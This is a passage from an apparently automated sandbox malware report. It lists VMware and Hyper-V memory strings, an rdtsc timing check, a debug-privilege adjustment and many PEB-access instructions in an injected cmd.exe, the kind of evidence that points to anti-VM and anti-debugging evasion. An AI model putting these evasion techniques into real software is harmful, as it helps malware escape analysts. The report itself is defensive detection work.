            Source: explorer.exe, 00000007.00000000.374000446.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
            Source: explorer.exe, 00000007.00000000.281739270.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.360032038.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
            Source: explorer.exe, 00000007.00000000.355070759.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E rdtsc
            Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C64257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C641E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C190AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C92073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C137F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C18EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C036CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C016E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C546A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C08E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C88DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C035A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
